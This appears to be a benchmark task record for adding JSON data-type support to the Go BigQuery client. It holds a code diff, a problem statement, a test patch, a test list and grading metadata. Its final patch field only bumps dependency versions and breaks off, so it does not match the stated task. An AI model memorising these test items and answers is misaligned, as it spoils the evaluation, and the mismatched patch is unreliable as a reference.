func (n *NullTimestamp) UnmarshalJSON(b []byte) error { n.Valid = false @@ -350,6 +375,7 @@ var ( typeOfNullBool = reflect.TypeOf(NullBool{}) typeOfNullString = reflect.TypeOf(NullString{}) typeOfNullGeography = reflect.TypeOf(NullGeography{}) + typeOfNullJSON = reflect.TypeOf(NullJSON{}) typeOfNullTimestamp = reflect.TypeOf(NullTimestamp{}) typeOfNullDate = reflect.TypeOf(NullDate{}) typeOfNullTime = reflect.TypeOf(NullTime{}) @@ -368,6 +394,8 @@ func nullableFieldType(t reflect.Type) FieldType { return StringFieldType case typeOfNullGeography: return GeographyFieldType + case typeOfNullJSON: + return JSONFieldType case typeOfNullTimestamp: return TimestampFieldType case typeOfNullDate: diff --git a/bigquery/params.go b/bigquery/params.go index 3c8f0f55be..33c7993ee2 100644 --- a/bigquery/params.go +++ b/bigquery/params.go @@ -78,6 +78,7 @@ var ( bigNumericParamType = &bq.QueryParameterType{Type: "BIGNUMERIC"} geographyParamType = &bq.QueryParameterType{Type: "GEOGRAPHY"} intervalParamType = &bq.QueryParameterType{Type: "INTERVAL"} + jsonParamType = &bq.QueryParameterType{Type: "JSON"} ) var ( @@ -171,6 +172,8 @@ func paramType(t reflect.Type) (*bq.QueryParameterType, error) { return stringParamType, nil case typeOfNullGeography: return geographyParamType, nil + case typeOfNullJSON: + return jsonParamType, nil } switch t.Kind() { case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint8, reflect.Uint16, reflect.Uint32: @@ -243,7 +246,8 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { typeOfNullTimestamp, typeOfNullDate, typeOfNullTime, - typeOfNullDateTime: + typeOfNullDateTime, + typeOfNullJSON: // Shared: If the Null type isn't valid, we have no value to send. // However, the backend requires us to send the QueryParameterValue with // the fields empty. 
@@ -261,6 +265,8 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { res.Value = fmt.Sprint(v.FieldByName("StringVal").Interface()) case typeOfNullGeography: res.Value = fmt.Sprint(v.FieldByName("GeographyVal").Interface()) + case typeOfNullJSON: + res.Value = fmt.Sprint(v.FieldByName("JSONVal").Interface()) case typeOfNullFloat64: res.Value = fmt.Sprint(v.FieldByName("Float64").Interface()) case typeOfNullBool: @@ -388,6 +394,7 @@ var paramTypeToFieldType = map[string]FieldType{ bigNumericParamType.Type: BigNumericFieldType, geographyParamType.Type: GeographyFieldType, intervalParamType.Type: IntervalFieldType, + jsonParamType.Type: JSONFieldType, } // Convert a parameter value from the service to a Go value. This is similar to, but @@ -432,6 +439,8 @@ func convertParamValue(qval *bq.QueryParameterValue, qtype *bq.QueryParameterTyp return NullTime{Valid: false}, nil case "GEOGRAPHY": return NullGeography{Valid: false}, nil + case "JSON": + return NullJSON{Valid: false}, nil } } diff --git a/bigquery/schema.go b/bigquery/schema.go index 4b090e0632..559f68f65c 100644 --- a/bigquery/schema.go +++ b/bigquery/schema.go @@ -244,6 +244,8 @@ const ( BigNumericFieldType FieldType = "BIGNUMERIC" // IntervalFieldType is a representation of a duration or an amount of time. IntervalFieldType FieldType = "INTERVAL" + // JSONFieldType is a representation of a json object. + JSONFieldType FieldType = "JSON" ) var ( @@ -263,6 +265,7 @@ var ( GeographyFieldType: true, BigNumericFieldType: true, IntervalFieldType: true, + JSONFieldType: true, } // The API will accept alias names for the types based on the Standard SQL type names. 
fieldAliases = map[FieldType]FieldType{ diff --git a/bigquery/value.go b/bigquery/value.go index 84e55acaae..8077aee5bf 100644 --- a/bigquery/value.go +++ b/bigquery/value.go @@ -178,6 +178,14 @@ func setGeography(v reflect.Value, x interface{}) error { return nil } +func setJSON(v reflect.Value, x interface{}) error { + if x == nil { + return errNoNulls + } + v.SetString(x.(string)) + return nil +} + func setBytes(v reflect.Value, x interface{}) error { if x == nil { v.SetBytes(nil) @@ -309,6 +317,18 @@ func determineSetFunc(ftype reflect.Type, stype FieldType) setFunc { } } + case JSONFieldType: + if ftype.Kind() == reflect.String { + return setJSON + } + if ftype == typeOfNullJSON { + return func(v reflect.Value, x interface{}) error { + return setNull(v, x, func() interface{} { + return NullJSON{JSONVal: x.(string), Valid: true} + }) + } + } + case BytesFieldType: if ftype == typeOfByteSlice { return setBytes @@ -960,6 +980,8 @@ func convertBasicType(val string, typ FieldType) (Value, error) { return Value(r), nil case GeographyFieldType: return val, nil + case JSONFieldType: + return val, nil case IntervalFieldType: i, err := ParseInterval(val) if err != nil {
feat(bigquery): support JSON as a data type
**Title** Add full support for the JSON data type in the BigQuery client library **Problem** The client library did not recognize BigQuery’s native JSON type, preventing users from sending, receiving, or defining JSON fields in queries and schemas. Null handling and parameter conversion for JSON were also missing. **Root Cause** The library’s type system, parameter mapping, and schema definitions lacked entries for the JSON type, so JSON values were treated as unknown or unsupported. **Fix / Expected Behavior** - Introduce a nullable representation for JSON values, with proper string conversion and JSON (un)marshaling. - Register JSON as a distinct field type and expose it through the public schema constants. - Map the JSON field type to the correct query‑parameter type and ensure parameter values are correctly serialized, including null handling. - Extend value conversion logic to accept JSON values when reading results or constructing queries. - Enable struct field mapping for JSON types, both for regular strings and the new nullable JSON wrapper. **Risk & Validation** - Verify that JSON values round‑trip correctly through insert, query, and export operations, including null cases. - Run existing tests to confirm no regressions in other nullable types or parameter handling. - Perform integration tests against a live BigQuery service to ensure the new type is accepted by the API and returned values are properly decoded.
5,986
googleapis/google-cloud-go
diff --git a/bigquery/nulls_test.go b/bigquery/nulls_test.go index 7e5c939a14..7e9b1f0054 100644 --- a/bigquery/nulls_test.go +++ b/bigquery/nulls_test.go @@ -39,6 +39,7 @@ func TestNullsJSON(t *testing.T) { {&NullBool{Valid: true, Bool: true}, `true`}, {&NullString{Valid: true, StringVal: "foo"}, `"foo"`}, {&NullGeography{Valid: true, GeographyVal: "ST_GEOPOINT(47.649154, -122.350220)"}, `"ST_GEOPOINT(47.649154, -122.350220)"`}, + {&NullJSON{Valid: true, JSONVal: "{\"foo\": \"bar\"}"}, `"{\"foo\": \"bar\"}"`}, {&NullTimestamp{Valid: true, Timestamp: testTimestamp}, `"2016-11-05T07:50:22.000000008Z"`}, {&NullDate{Valid: true, Date: testDate}, `"2016-11-05"`}, {&NullTime{Valid: true, Time: nullsTestTime}, `"07:50:22.000001"`}, @@ -49,6 +50,7 @@ func TestNullsJSON(t *testing.T) { {&NullBool{}, `null`}, {&NullString{}, `null`}, {&NullGeography{}, `null`}, + {&NullJSON{}, `null`}, {&NullTimestamp{}, `null`}, {&NullDate{}, `null`}, {&NullTime{}, `null`}, diff --git a/bigquery/params_test.go b/bigquery/params_test.go index 366184894a..6be55301d0 100644 --- a/bigquery/params_test.go +++ b/bigquery/params_test.go @@ -119,6 +119,8 @@ var scalarTests = []struct { {&IntervalValue{Years: 1, Months: 2, Days: 3}, false, "1-2 3 0:0:0", intervalParamType, &IntervalValue{Years: 1, Months: 2, Days: 3}}, {NullGeography{GeographyVal: "POINT(-122.335503 47.625536)", Valid: true}, false, "POINT(-122.335503 47.625536)", geographyParamType, "POINT(-122.335503 47.625536)"}, {NullGeography{Valid: false}, true, "", geographyParamType, NullGeography{Valid: false}}, + {NullJSON{Valid: true, JSONVal: "{\"alpha\":\"beta\"}"}, false, "{\"alpha\":\"beta\"}", jsonParamType, "{\"alpha\":\"beta\"}"}, + {NullJSON{Valid: false}, true, "", jsonParamType, NullJSON{Valid: false}}, } type ( diff --git a/bigquery/value_test.go b/bigquery/value_test.go index 4d08336ed0..3bd7961586 100644 --- a/bigquery/value_test.go +++ b/bigquery/value_test.go @@ -38,6 +38,7 @@ func TestConvertBasicValues(t *testing.T) { 
{Type: NumericFieldType}, {Type: BigNumericFieldType}, {Type: GeographyFieldType}, + {Type: JSONFieldType}, } row := &bq.TableRow{ F: []*bq.TableCell{ @@ -49,6 +50,7 @@ func TestConvertBasicValues(t *testing.T) { {V: "123.123456789"}, {V: "99999999999999999999999999999999999999.99999999999999999999999999999999999999"}, {V: testGeography}, + {V: "{\"alpha\": \"beta\"}"}, }, } got, err := convertRow(row, schema) @@ -58,7 +60,7 @@ func TestConvertBasicValues(t *testing.T) { bigRatVal := new(big.Rat) bigRatVal.SetString("99999999999999999999999999999999999999.99999999999999999999999999999999999999") - want := []Value{"a", int64(1), 1.2, true, []byte("foo"), big.NewRat(123123456789, 1e9), bigRatVal, testGeography} + want := []Value{"a", int64(1), 1.2, true, []byte("foo"), big.NewRat(123123456789, 1e9), bigRatVal, testGeography, "{\"alpha\": \"beta\"}"} if !testutil.Equal(got, want) { t.Errorf("converting basic values: got:\n%v\nwant:\n%v", got, want) }
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/NaN", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/FromRoutineArgument/basic", 
"TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Method: NullJSON.String() string Location: bigquery/nulls.go Inputs: none (receiver NullJSON) Outputs: string – returns `"null"` if n.Valid is false, otherwise the JSON string value. Description: Provides a string representation of a nullable JSON value for debugging and formatting. Method: NullJSON.MarshalJSON() ([]byte, error) Location: bigquery/nulls.go Inputs: none (receiver NullJSON) Outputs: []byte – the JSON encoding of the value (or the literal `null`), error – always nil unless marshaling fails. Description: Serializes a NullJSON into JSON, emitting `null` when the value is invalid. Method: (*NullJSON).UnmarshalJSON(b []byte) error Location: bigquery/nulls.go Inputs: b []byte – the raw JSON payload. Outputs: error – nil on success, or a JSON unmarshaling error. Description: Parses JSON into a NullJSON, setting Valid to false for the literal `null` and to true with the extracted string otherwise. Function: JSONFieldType FieldType = "JSON" Location: bigquery/schema.go Inputs: none (constant) Outputs: FieldType – the identifier used to represent JSON columns in BigQuery schemas. Description: Declares the schema field type for JSON values, enabling schema generation and type mapping. Function: setJSON(v reflect.Value, x interface{}) error Location: bigquery/value.go Inputs: v reflect.Value – a reflect.Value of a string field; x interface{} – the incoming JSON value (expected string or nil). Outputs: error – errNoNulls if x is nil; otherwise nil after setting the string value. Description: Assigns a non‑null JSON string to a struct field during result conversion; rejects nil values because BigQuery does not return NULL for JSON fields.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 4, "num_modified_lines": 63, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "stale: extraold: Pull request is critically old and needs prioritization.", "size: m: Pull request size is medium." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding JSON support to the BigQuery client, and the test patch adds expectations for NullJSON, JSON param types, schema field, and value conversion. The tests directly verify the needed behavior and there are no unrelated test dependencies. While the issue description is brief, the required functionality is clear from the tests, making the task solvable without external info or naming ambiguities.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
22d9f1e0cb114e7df2fe21fba4b26b869c9ce323
2022-05-19 17:30:36
googleapis__google-cloud-go-6069
diff --git a/bigquery/go.mod b/bigquery/go.mod index 6377029efa..bc4207dac1 100644 --- a/bigquery/go.mod +++ b/bigquery/go.mod @@ -6,7 +6,7 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/datacatalog v1.3.0 cloud.google.com/go/iam v0.3.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.8 github.com/googleapis/gax-go/v2 v2.3.0 diff --git a/bigquery/go.sum b/bigquery/go.sum index a66ea10a26..79e62cd6bc 100644 --- a/bigquery/go.sum +++ b/bigquery/go.sum @@ -55,8 +55,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -165,6 +165,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod 
h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -565,7 +566,6 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220414192740-2d67ff6cf2b4/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= diff --git a/go.mod b/go.mod index 9f02f4bd2c..8c8a17de45 100644 --- a/go.mod +++ b/go.mod @@ -4,7 +4,7 @@ go 1.15 require ( cloud.google.com/go/compute v1.6.1 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.8 github.com/google/martian/v3 v3.2.1 diff --git a/go.sum b/go.sum index d405d8d117..d17d9aa715 100644 --- a/go.sum +++ b/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod 
h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -162,6 +162,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -561,7 +562,6 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod 
h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220414192740-2d67ff6cf2b4/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= diff --git a/internal/godocfx/go.mod b/internal/godocfx/go.mod index 61b6f8deeb..c96a309d14 100644 --- a/internal/godocfx/go.mod +++ b/internal/godocfx/go.mod @@ -6,7 +6,7 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/bigquery v1.31.0 cloud.google.com/go/datastore v1.6.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/google/go-cmp v0.5.8 github.com/yuin/goldmark v1.4.11 golang.org/x/sync v0.0.0-20210220032951-036812b2e83c diff --git a/internal/godocfx/go.sum b/internal/godocfx/go.sum index 17edfcec5b..6332babe33 100644 --- a/internal/godocfx/go.sum +++ b/internal/godocfx/go.sum @@ -12,8 +12,9 @@ cloud.google.com/go/datastore v1.6.0 h1:wZaHIqu1tebvGRYhVgcfNX6jN2q638OGO23JyJck cloud.google.com/go/datastore v1.6.0/go.mod h1:q3ZJj1GMQRdU0OCv5XXpCqfLqHHZnI5zcumkvuYDmHI= cloud.google.com/go/iam v0.3.0 h1:exkAomrVUuzx9kWFI1wm3KI0uoDeUFPB4kKGzx6x+Gc= cloud.google.com/go/iam v0.3.0/go.mod h1:XzJPvDayI+9zsASAFO68Hk07u3z+f+JrT2xXNdp4bnY= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/OneOfOne/xxhash v1.2.2/go.mod 
h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= @@ -75,6 +76,7 @@ github.com/google/go-cmp v0.5.8 h1:e6P7q2lk1O+qJJb4BtCQXlK8vWEO8V1ZeuEdJNOqZyg= github.com/google/go-cmp v0.5.8/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/martian/v3 v3.2.1 h1:d8MncMlErDFTwQGBK1xhv026j9kqhvw1Qv9IbWT1VLQ= github.com/google/martian/v3 v3.2.1/go.mod h1:oBOf6HBosgwRXnUGWUB05QECsc6uvmMiJ3+6W4l/CUk= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.1.0/go.mod h1:Q3nei7sK6ybPYH7twZdmQpAd1MKb7pfu6SK+H1/DsU0= diff --git a/logging/go.mod b/logging/go.mod index 70ba523c03..940f500be7 100644 --- a/logging/go.mod +++ b/logging/go.mod @@ -6,14 +6,14 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/compute v1.6.0 cloud.google.com/go/iam v0.3.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.7 github.com/googleapis/gax-go/v2 v2.3.0 go.opencensus.io v0.23.0 golang.org/x/oauth2 v0.0.0-20220411215720-9780585627b5 google.golang.org/api v0.74.0 - google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 - google.golang.org/grpc v1.45.0 + google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 + google.golang.org/grpc v1.46.0 google.golang.org/protobuf v1.28.0 ) diff --git a/logging/go.sum b/logging/go.sum index 97e30ead5b..5e5ac84b62 100644 --- a/logging/go.sum +++ b/logging/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod 
